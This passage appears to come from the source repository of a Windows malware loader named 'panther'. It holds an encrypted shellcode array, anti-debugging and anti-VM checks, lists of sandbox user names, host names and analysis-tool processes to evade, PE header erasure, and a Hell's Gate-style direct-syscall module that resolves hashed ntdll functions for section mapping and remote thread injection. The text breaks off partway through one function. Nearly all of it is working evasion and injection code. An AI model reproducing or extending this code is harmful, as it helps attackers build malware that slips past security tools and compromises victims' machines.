38 | 
39 | // MSG BOX
40 | //unsigned char payload[] = "\x90\xb6\xf4\x21\x96\x67\x07\xc0\xc7\x5e\x34\x96\x93\x4b\x2a\x1f\x32\x80\x1b\x3f\x63\x53\xad\xc1\xb4\x66\x4a\xe1\x07\x58\x55\x6f\xe1\x53\x08\x2b\xa8\xe1\x18\x44\xc1\xdf\x76\x9d\x7b\xe3\xb8\xc2\x0a\xcb\x74\x57\x6a\x16\x08\xc1\xe3\xb5\x32\xc8\x72\x07\xa0\x89\xca\xfd\xe0\xb3\x4d\x5d\x36\x7d\x0d\x32\xc3\xc2\x20\x57\x0d\xb1\x09\x5c\x39\x32\x1b\x1f\x4b\x4a\x71\x29\xe1\xf3\x03\x3d\x1a\x6f\xe9\x2a\x84\xaf\xc1\x11\x59\xc9\xfc\xe1\x43\x69\x27\xe0\x63\x3b\xf2\xf4\x9f\x5f\x3d\xb2\x2f\x3e\x73\xc3\x21\xa9\x14\xa0\x8c\x5e\x10\xd7\xfd\xff\x40\xa8\x9a\x72\xf1\xa3\x1f\xce\xb3\x7d\x52\x85\x7a\x9a\x2f\x20\x94\xb0\x5e\xac\x6b\xb3\xae\x35\xdf\xf2\x4e\xd0\x7e\x68\x58\x8b\xbc\xde\xde\x80\x6f\xb5\x05\xf6\x30\xb6\xd0\x3c\x85\x2b\x17\x75\xf3\x78\x2b\x1b\x5d\xc1\x91\x53\x6a\xdb\xd8\xf5\x97\x63\xfe\x0f\x16\x4e\xb5\xbd\x10\xdd\x1a\x5e\xe5\xbd\x9f\xfe\xf6\x1f\xc0\xb6\x6f\xd8\x23\xa7\x01\xc5\x0e\x2e\x94\xc0\x1b\x08\x42\x30\xf6\x5c\x35\x40\xdb\xfc\x7a\xf4\x77\xf9\x1c\xa4\xf5\x27\x63\xa0\x96\x5d\xdd\xa5\xa4\x49\x71\x87\xe7\x3c\x1c\xe1\x8a\x8f\xfe\xde\x8b\x5b\x3a\xf4\x62\x9a\xbc\xa2\xb9\x0e\x47\x21\xa4\xd7\xae\x2f\xa5\xf7\x75\x15\x85\x7c\x8a\x72\x93\x9a\xc2\x70\x12\x68\x84\xf4\xe8\xb2\xe7\xdb\x30\x48\xb4\x01\xbd\x78\x32\x70\x79\xb1\x2e\x39\xec\x42\xae\x42\x9e\xe4\xec\x97\x00\xa4\x9c\x0e\x7b\x8e\x6f\xe6\x43\x1c\xee\xa7\x9e\xd0\x50\x19\x8a\xaf\x7b\xed\xfe\xb0\x20\x8d\x20\x27\xa9\xec\xed\x6b\x8b\xa9\xee\x1e\xbe\x88\x2e\x37\xc0\xde\x1c\xd5\x3f\x76\x4d\xa9\x82\x3b\x68\x46\x3d\x06\x43\x24\x56\xaa\x45\x6f\x68\xd5\xee\xd3\xe9\x23\xe5\x16\x9e\x07\x53\x0f\x59\x82\x95\x01\x49\xb5\x8f\x33\x77\x8e\xb6\x53\x65\x38\x79\x5c\x37\x24\x38\xa2\x15\x49\xf0\x1a\x58\xec\x23\xa3\xa1\xd9\xe9\xfd\x46\xd3\x95\xc7\x4f\xfa\x93\x19\x4f\xd5\x73\xb6\x6c\x90\xec\xc8\x8c\xf8";
41 | 


--------------------------------------------------------------------------------
/panther/sandbox_debugging.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | #include "headers.h"
  3 | 
  4 | BOOL IsDebuggedPEB() {
  5 | 
  6 | 	PPEB ppeb{};
  7 | 
  8 | #ifdef	_WIN64
  9 | 	ppeb = (PPEB)__readgsqword(0x60);
 10 | 
 11 | #elif _WIN32
 12 | 	ppeb = (PPEB)__readfsdword(0x30);  
 13 | 
 14 | #endif
 15 | 	return (ppeb->BeingDebugged == 1 ) ? TRUE : FALSE;
 16 | 
 17 | }
 18 | 
 19 | typedef BOOL (WINAPI* _IsDebuggerPresent)(VOID);
 20 | BOOL IsDebugged() {
 21 | 
 22 | 	_IsDebuggerPresent C_IsDebuggerPresent = 
 23 | 		(_IsDebuggerPresent)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strIsDebuggerPresent);
 24 | 
 25 | 	BOOL res = FALSE;
 26 | 
 27 | 	BOOL debug = C_IsDebuggerPresent();
 28 | 	switch (debug) {
 29 | 
 30 | 	case TRUE:
 31 | 		res = TRUE;
 32 | 	case FALSE:
 33 | 		res = FALSE;
 34 | 
 35 | 	}
 36 | 
 37 | 	return res;
 38 | }
 39 | 
 40 | typedef BOOL (WINAPI* _CheckRemoteDebuggerPresent)(
 41 | 	_In_ HANDLE hProcess,
 42 | 	_Out_ PBOOL pbDebuggerPresent
 43 | );
 44 | 
 45 | BOOL IsRemoteDebuggerPresent() {
 46 | 
 47 | 	_CheckRemoteDebuggerPresent C_CheckRemoteDebuggerPresent = 
 48 | 		(_CheckRemoteDebuggerPresent)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strCheckRemoteDebuggerPresent);
 49 | 
 50 | 	BOOL res = FALSE;
 51 | 
 52 | 	BOOL pbDebuggerPresent = FALSE;
 53 | 	BOOL bRemoteDebug = C_CheckRemoteDebuggerPresent((HANDLE)-1, &pbDebuggerPresent);
 54 | 	if (pbDebuggerPresent == TRUE) {
 55 | 		res = TRUE;
 56 | 	}
 57 | 
 58 | 	return res;
 59 | }
 60 | 
 61 | typedef BOOL (WINAPI* _GetUserNameA)(
 62 | 	_Out_writes_to_opt_(*pcbBuffer, *pcbBuffer) LPSTR lpBuffer,
 63 | 	_Inout_ LPDWORD pcbBuffer
 64 | );
 65 | 
 66 | BOOL VMUserCheck() {
 67 | 
 68 | 	t_LoadLibraryW C_LoadLibraryW = (t_LoadLibraryW)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strLoadLibraryW);
 69 | 
 70 | 	HMODULE hAdvapi32 = C_LoadLibraryW(wstradvapi32dll);
 71 | 
 72 | 	_GetUserNameA C_GetUserNameA =
 73 | 		(_GetUserNameA)C_GetProcAddr(C_GetModuleHandle(wstradvapi32dll), strGetUserNameA);
 74 | 
 75 | 	BOOL res = FALSE;
 76 | 	
 77 | 	const char* szUsernames[] = {
 78 | 
 79 | 		"CurrentUser",
 80 | 		"Sand box",
 81 | 		"Emily",
 82 | 		"HAPUBWS",
 83 | 		"Hong Lee",
 84 | 		"IT-ADMIN",
 85 | 		"Johnson",
 86 | 		"Miller",
 87 | 		"milozs",
 88 | 		"Peter Wilson",
 89 | 		"timmy",
 90 | 		"user",
 91 | 		"sandbox",
 92 | 		"malware",
 93 | 		"maltest",
 94 | 		"test user",
 95 | 		"virus",
 96 | 		"John Doe",
 97 | 		"WDAGUtilityAccount",
 98 | 	};
 99 | 		
100 | 	char currentUser[MAX_PATH];
101 | 	DWORD dwCurrentUser = MAX_PATH;
102 | 
103 | 	BOOL getUser = C_GetUserNameA((LPSTR)&currentUser, &dwCurrentUser);
104 | 	if (getUser == FALSE) return res;
105 | 
106 | 	WORD dwLength = sizeof(szUsernames) / sizeof(szUsernames[0]);
107 | 	for (int i = 0; i < dwLength; i++) {
108 | 		if (lstrcmpiA(szUsernames[i], currentUser) == 0) {
109 | 			printf("[CHECK] Found a sandbox user \t( %s )\n", szUsernames[i]);
110 | 			res = TRUE;
111 | 		}
112 | 	}
113 | 
114 | 	
115 | 	t_FreeLibrary C_FreeLibrary = (t_FreeLibrary)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strFreeLibrary);
116 | 	C_FreeLibrary(hAdvapi32);
117 | 
118 | 	return res;
119 | }
120 | 
121 | typedef BOOL (WINAPI* _GetComputerNameA)(
122 | 	_Out_writes_to_opt_(*nSize, *nSize + 1) LPSTR lpBuffer,
123 | 	_Inout_ LPDWORD nSize
124 | );
125 | 
126 | BOOL VMHostnameCheck() {
127 | 
128 | 	_GetComputerNameA C_GetComputerNameA =
129 | 		(_GetComputerNameA)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strGetComputerNameA);
130 | 
131 | 	BOOL res = FALSE;
132 | 
133 | 	const char* szHostnames[] = {
134 | 		"SANDBOX",
135 | 		"7SILVIA",
136 | 		"HANSPETER-PC",
137 | 		"JOHN-PC",
138 | 		"MUELLER-PC",
139 | 		"WIN7-TRAPS",
140 | 		"FORTINET",
141 | 		"TEQUILABOOMBOOM"
142 | 	};
143 | 
144 | 	char currentHostname[MAX_PATH];
145 | 	DWORD dwCurrentHostname = MAX_PATH;
146 | 
147 | 	if (C_GetComputerNameA((LPSTR)&currentHostname, &dwCurrentHostname) == FALSE) {
148 | 		return EXIT_FAILURE;
149 | 	};
150 | 
151 | 	WORD dwLength = sizeof(szHostnames) / sizeof(szHostnames[0]);
152 | 
153 | 	for (int i = 0; i < dwLength; i++) {
154 | 		if (lstrcmpiA(szHostnames[0], currentHostname) == 0) {
155 | 			printf("[CHECK] Running in sandbox environment \t( %s )\n", szHostnames[0]);
156 | 			res = TRUE;
157 | 		}
158 | 	}
159 | 
160 | 	return res;
161 | }
162 | 
163 | 
164 | typedef BOOL(WINAPI* _VirtualProtect)(
165 | 	_In_  LPVOID lpAddress,
166 | 	_In_  SIZE_T dwSize,
167 | 	_In_  DWORD flNewProtect,
168 | 	_Out_ PDWORD lpflOldProtect
169 | );
170 | 
171 | VOID ErasePEHeaderFromMemory() {
172 | 
173 | 	_VirtualProtect C_VirtualProtect =
174 | 		(_VirtualProtect)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strVirtualProtect);
175 | 
176 | 	printf("[*] Erasing PE header from memory\n");
177 | 	DWORD OldProtect = 0;
178 | 
179 | 	char* pBaseAddr = (char*)C_GetModuleHandle(NULL);
180 | 
181 | 	C_VirtualProtect(pBaseAddr, 4096, PAGE_READWRITE, &OldProtect);
182 | 
183 | 	RtlSecureZeroMemory(pBaseAddr, 4096);
184 | }
185 | 
186 | typedef BOOL (WINAPI* t_WTSEnumerateProcessesW)(
187 | 	IN HANDLE hServer,
188 | 	IN DWORD Reserved,
189 | 	IN DWORD Version,
190 | 	OUT PWTS_PROCESS_INFOW* ppProcessInfo,
191 | 	OUT DWORD* pCount
192 | );
193 | 
194 | typedef BOOL (WINAPI* t_WTSEnumerateProcessesA)(
195 | 	IN HANDLE hServer,
196 | 	IN DWORD Reserved,
197 | 	IN DWORD Version,
198 | 	OUT PWTS_PROCESS_INFOA* ppProcessInfo,
199 | 	OUT DWORD* pCount
200 | );
201 | 
202 | #ifdef UNICODE
203 | #define WTSEnumerateProcesses WTSEnumerateProcessesW
204 | #else
205 | #define WTSEnumerateProcesses WTSEnumerateProcessesA
206 | #endif
207 | 
208 | INT analysis_tools_process() {
209 | 
210 | 	t_LoadLibraryW C_LoadLibraryW = (t_LoadLibraryW)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strLoadLibraryW);
211 | 	t_FreeLibrary C_FreeLibrary = (t_FreeLibrary)C_GetProcAddr(C_GetModuleHandle(wstrkernel32), strFreeLibrary);
212 | 
213 | 	HMODULE hWtsApi32 = C_LoadLibraryW(wstrWtsApi32dll);
214 | 
215 | 	int res = 0;
216 | 
217 | 	const char* szProcesses[] = {
218 | 		"ollydbg.exe",			
219 | 		"ProcessHacker.exe",
220 | 		"tcpview.exe",		
221 | 		"autoruns.exe",		
222 | 		"autorunsc.exe",	
223 | 		"filemon.exe",		
224 | 		"procmon.exe",		
225 | 		"regmon.exe",		
226 | 		"procexp.exe",		
227 | 		"idaq.exe",			
228 | 		"idaq64.exe",		
229 | 		"ImmunityDebugger.exe",
230 | 		"Wireshark.exe",	
231 | 		"dumpcap.exe",		
232 | 		"HookExplorer.exe",	
233 | 		"ImportREC.exe",	
234 | 		"PETools.exe",		
235 | 		"LordPE.exe",		
236 | 		"SysInspector.exe",	
237 | 		"proc_analyzer.exe",
238 | 		"sysAnalyzer.exe",	
239 | 		"sniff_hit.exe",	
240 | 		"windbg.exe",		
241 | 		"joeboxcontrol.exe",
242 | 		"joeboxserver.exe",	
243 | 		"joeboxserver.exe",	
244 | 		"ResourceHacker.exe",
245 | 		"x32dbg.exe",		
246 | 		"x64dbg.exe",		
247 | 		"Fiddler.exe",		
248 | 		"httpdebugger.exe",	
249 | 		"apimonitor-x64.exe",
250 | 		"apimonitor-x86.exe",
251 | 	};
252 | 
253 | 	DWORD iLength = sizeof(szProcesses) / sizeof(szProcesses[0]);
254 | 	
255 | 	printf("[*] Checking for malware analysis tools\n");
256 | 
257 | 	WTS_PROCESS_INFOA* wtsinfo;
258 | 	DWORD pCount = 0;
259 | 
260 | 	t_WTSEnumerateProcessesA C_WTSEnumerateProcessesA =
261 | 		(t_WTSEnumerateProcessesA)C_GetProcAddr(C_GetModuleHandle(wstrWtsApi32dll), strwtsEnumProc);
262 | 
263 | 	if (C_WTSEnumerateProcessesA((HANDLE)NULL, 0, 1, &wtsinfo, &pCount)) {
264 | 
265 | 		for (DWORD i = 0; i < pCount; i++) {
266 | 			for (DWORD o = 0; o < iLength; o++) {
267 | 				if (lstrcmpiA(szProcesses[o], wtsinfo[i].pProcessName) == 0) {
268 | 					res = 1;
269 | 					break;
270 | 				}
271 | 			}
272 | 		}
273 | 	}
274 | 
275 | 	return res;
276 | 
277 | }


--------------------------------------------------------------------------------
/panther/panther.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{6756201d-5c39-49ce-b4e2-fbb706196e81}</ProjectGuid>
 25 |     <RootNamespace>panther</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |     <SpectreMitigation>false</SpectreMitigation>
 55 |   </PropertyGroup>
 56 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 57 |   <ImportGroup Label="ExtensionSettings">
 58 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="Shared">
 61 |   </ImportGroup>
 62 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 63 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 64 |   </ImportGroup>
 65 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 66 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 67 |   </ImportGroup>
 68 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 69 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 70 |   </ImportGroup>
 71 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 72 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 73 |   </ImportGroup>
 74 |   <PropertyGroup Label="UserMacros" />
 75 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 76 |     <GenerateManifest>false</GenerateManifest>
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |     <EnableMicrosoftCodeAnalysis>false</EnableMicrosoftCodeAnalysis>
 79 |   </PropertyGroup>
 80 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 81 |     <ClCompile>
 82 |       <WarningLevel>Level3</WarningLevel>
 83 |       <SDLCheck>true</SDLCheck>
 84 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 85 |       <ConformanceMode>true</ConformanceMode>
 86 |     </ClCompile>
 87 |     <Link>
 88 |       <SubSystem>Console</SubSystem>
 89 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 90 |     </Link>
 91 |   </ItemDefinitionGroup>
 92 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 93 |     <ClCompile>
 94 |       <WarningLevel>Level3</WarningLevel>
 95 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 96 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 97 |       <SDLCheck>true</SDLCheck>
 98 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 99 |       <ConformanceMode>true</ConformanceMode>
100 |     </ClCompile>
101 |     <Link>
102 |       <SubSystem>Console</SubSystem>
103 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
104 |       <OptimizeReferences>true</OptimizeReferences>
105 |       <GenerateDebugInformation>true</GenerateDebugInformation>
106 |     </Link>
107 |   </ItemDefinitionGroup>
108 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
109 |     <ClCompile>
110 |       <WarningLevel>Level3</WarningLevel>
111 |       <SDLCheck>true</SDLCheck>
112 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
113 |       <ConformanceMode>true</ConformanceMode>
114 |     </ClCompile>
115 |     <Link>
116 |       <SubSystem>Console</SubSystem>
117 |       <GenerateDebugInformation>true</GenerateDebugInformation>
118 |     </Link>
119 |   </ItemDefinitionGroup>
120 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
121 |     <ClCompile>
122 |       <WarningLevel>Level3</WarningLevel>
123 |       <FunctionLevelLinking>true</FunctionLevelLinking>
124 |       <IntrinsicFunctions>false</IntrinsicFunctions>
125 |       <SDLCheck>false</SDLCheck>
126 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
127 |       <ConformanceMode>true</ConformanceMode>
128 |       <BufferSecurityCheck>true</BufferSecurityCheck>
129 |       <Optimization>Custom</Optimization>
130 |       <WholeProgramOptimization>true</WholeProgramOptimization>
131 |       <CallingConvention>Cdecl</CallingConvention>
132 |       <CompileAs>Default</CompileAs>
133 |       <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
134 |       <StringPooling>false</StringPooling>
135 |       <ExceptionHandling>false</ExceptionHandling>
136 |       <ErrorReporting>None</ErrorReporting>
137 |       <UseFullPaths>false</UseFullPaths>
138 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
139 |     </ClCompile>
140 |     <Link>
141 |       <SubSystem>Console</SubSystem>
142 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
143 |       <OptimizeReferences>false</OptimizeReferences>
144 |       <GenerateDebugInformation>false</GenerateDebugInformation>
145 |       <AssemblyDebug>false</AssemblyDebug>
146 |       <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration>
147 |       <GenerateWindowsMetadata>false</GenerateWindowsMetadata>
148 |       <DataExecutionPrevention>true</DataExecutionPrevention>
149 |       <LinkErrorReporting>NoErrorReport</LinkErrorReporting>
150 |     </Link>
151 |     <ProjectReference>
152 |       <LinkLibraryDependencies>true</LinkLibraryDependencies>
153 |     </ProjectReference>
154 |     <MASM>
155 |       <GenerateDebugInformation>false</GenerateDebugInformation>
156 |     </MASM>
157 |   </ItemDefinitionGroup>
158 |   <ItemGroup>
159 |     <ClCompile Include="main.cpp" />
160 |   </ItemGroup>
161 |   <ItemGroup>
162 |     <ClInclude Include="crypt.h" />
163 |     <ClInclude Include="customs.h" />
164 |     <ClInclude Include="defs.h" />
165 |     <ClInclude Include="gate.h">
166 |       <FileType>CppHeader</FileType>
167 |     </ClInclude>
168 |     <ClInclude Include="gate_structs.h" />
169 |     <MASM Include="gate.asm">
170 |       <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExcludedFromBuild>
171 |       <DeploymentContent Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</DeploymentContent>
172 |       <FileType>Document</FileType>
173 |       <GenerateDebugInformation Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</GenerateDebugInformation>
174 |       <DeploymentContent>false</DeploymentContent>
175 |     </MASM>
176 |     <ClInclude Include="headers.h" />
177 |     <ClInclude Include="helpers.h" />
178 |     <ClInclude Include="ntstatus.h" />
179 |     <ClInclude Include="rc4.h" />
180 |     <ClInclude Include="resource.h" />
181 |     <ClInclude Include="sandbox_debugging.h" />
182 |   </ItemGroup>
183 |   <ItemGroup>
184 |     <ResourceCompile Include="panther.rc" />
185 |   </ItemGroup>
186 |   <ItemGroup>
187 |     <None Include="payload.bin" />
188 |   </ItemGroup>
189 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
190 |   <ImportGroup Label="ExtensionTargets">
191 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
192 |   </ImportGroup>
193 | </Project>


--------------------------------------------------------------------------------
/panther/gate.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | 
  3 | #include "gate_structs.h"
  4 | #include "crypt.h"
  5 | 
  6 | #include <stdarg.h>
  7 | #include <time.h>
  8 | 
  9 | #include "resource.h"
 10 | 
 11 | #define UP -32
 12 | #define DOWN 32
 13 | 
 14 | typedef enum _SECTION_INHERIT {
 15 | 	ViewShare = 1,
 16 | 	ViewUnmap = 2
 17 | } SECTION_INHERIT, * PSECTION_INHERIT;
 18 | 
 19 | extern "C" VOID CreateGate(WORD wSystemCall);
 20 | extern "C" LONG GateDescent(...);
 21 | 
 22 | typedef struct _VX_TABLE_ENTRY {
 23 | 	PVOID   pAddress;
 24 | 	DWORD64 dwHash;
 25 | 	WORD    wSystemCall;
 26 | } VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
 27 | 
 28 | typedef struct _VX_TABLE {
 29 | 	VX_TABLE_ENTRY NtCreateSection;
 30 | 	VX_TABLE_ENTRY NtMapViewOfSection;
 31 | 	VX_TABLE_ENTRY NtUnmapViewOfSection;
 32 | 	VX_TABLE_ENTRY NtClose;
 33 | 	VX_TABLE_ENTRY NtCreateThreadEx;
 34 | 	VX_TABLE_ENTRY NtWriteVirtualMemory;
 35 | 	VX_TABLE_ENTRY NtWaitForSingleObject;
 36 | } VX_TABLE, * PVX_TABLE;
 37 | 
 38 | PTEB RtlGetThreadEnvironmentBlock();
 39 | BOOL GetImageExportDirectory(
 40 | 	_In_ PVOID                     pModuleBase,
 41 | 	_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
 42 | );
 43 | BOOL GetVxTableEntry(
 44 | 	_In_ PVOID pModuleBase,
 45 | 	_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
 46 | 	_In_ PVX_TABLE_ENTRY pVxTableEntry
 47 | );
 48 | 
 49 | BOOL Payload(
 50 | 	_In_ PVX_TABLE pVxTable
 51 | );
 52 | 
 53 | INT GateSmasher() {
 54 | 
 55 | 	PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
 56 | 	PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
 57 | 	if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
 58 | 		return 0x1;
 59 | 
 60 | 	PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LdrData->InMemoryOrderModuleList.Flink->Flink - 0x10);
 61 | 
 62 | 	PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
 63 | 	if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
 64 | 		return 0x01;
 65 | 	VX_TABLE Table = { 0 };
 66 | 
 67 | 	Table.NtCreateSection.dwHash = 0x309c238a4e51667c;
 68 | 	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateSection))
 69 | 		return 0x1;
 70 | 	
 71 | 	Table.NtMapViewOfSection.dwHash = 0xb0de5c1838968f96;
 72 | 	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtMapViewOfSection))
 73 | 		return 0x1;
 74 | 
 75 | 	Table.NtUnmapViewOfSection.dwHash = 0xa484b5a6aa7dc5d9;
 76 | 	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtUnmapViewOfSection))
 77 | 		return 0x1;
 78 | 
 79 | 	Table.NtCreateThreadEx.dwHash = 0x442094df0d981c5c;
 80 | 	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
 81 | 		return 0x1;
 82 | 
 83 | 	Table.NtWriteVirtualMemory.dwHash = 0xed40f374e72158be;
 84 | 	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWriteVirtualMemory))
 85 | 		return 0x1;
 86 | 
 87 | 	Table.NtWaitForSingleObject.dwHash = 0xdee64225c3519ce8;
 88 | 	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
 89 | 		return 0x1;
 90 | 
 91 | 	Table.NtClose.dwHash = 0xfe5dfdd24cc6ce9;
 92 | 	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtClose))
 93 | 		return 0x1;
 94 | 	
 95 | 
 96 | 	Payload(&Table);
 97 | 	return 0x00;
 98 | }
 99 | 
100 | PTEB RtlGetThreadEnvironmentBlock() {
101 | #if _WIN64
102 | 	return (PTEB)__readgsqword(0x30);
103 | #else
104 | 	return (PTEB)__readfsdword(0x16);
105 | #endif
106 | }
107 | 
108 | DWORD64 djb2(PBYTE str) {
109 | 	DWORD64 dwHash = 0x35333831;
110 | 	INT c;
111 | 
112 | 	while (c = *str++)
113 | 		dwHash = ((dwHash << 0x5) + dwHash) + c;
114 | 
115 | 	return dwHash;
116 | }
117 | 
118 | BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
119 | 
120 | 	PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
121 | 	if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
122 | 		return FALSE;
123 | 	}
124 | 
125 | 	PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
126 | 	if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
127 | 		return FALSE;
128 | 	}
129 | 
130 | 	*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
131 | 	return TRUE;
132 | }
133 | 
134 | BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
135 | 	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
